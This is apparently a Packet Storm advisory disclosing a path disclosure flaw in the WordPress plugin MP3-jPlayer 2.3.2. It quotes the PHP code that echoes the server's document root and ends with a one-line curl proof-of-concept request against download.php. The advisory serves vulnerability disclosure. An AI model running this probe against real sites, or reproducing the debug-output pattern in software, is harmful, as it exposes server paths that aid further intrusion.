WordPress MP3-jPlayer 2.3.2 Path Disclosure

2015-08-06T00:00:00
ID PACKETSTORM:132984
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2015-08-06T00:00:00

Description

                                        
                                            `Title: Path Disclosure Vulnerability in wordpress plugin MP3-jPlayer v2.3.2  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-07-12  
Download Site: https://wordpress.org/plugins/mp3-jplayer/  
Vendor: https://profiles.wordpress.org/simonward-1/  
Vendor Notified: 2015-08-06  
Vendor Contact:  
Description: Easy, Flexible Audio for WordPress.  
Vulnerability:  
The download code allows arbitrary users to disclose path information on wordpress sites with this plugin installed.   
  
120 $info = "<p>  
121 Get: " . $mp3 . "<br />  
122 Sent: " . $sent . "<br />  
123 File: " . $file . "<br />  
124 Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />  
125 Root: " . $rooturl . "<br />  
126 pID: " . $playerID . "<br />  
127 Dbug: " . $dbug . "<br />  
128 extension: " . $fileExtension . "</p>";  
129 echo $info;  
  
CVEID:  
OSVDB:  
Exploit Code:  
• $ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.  
`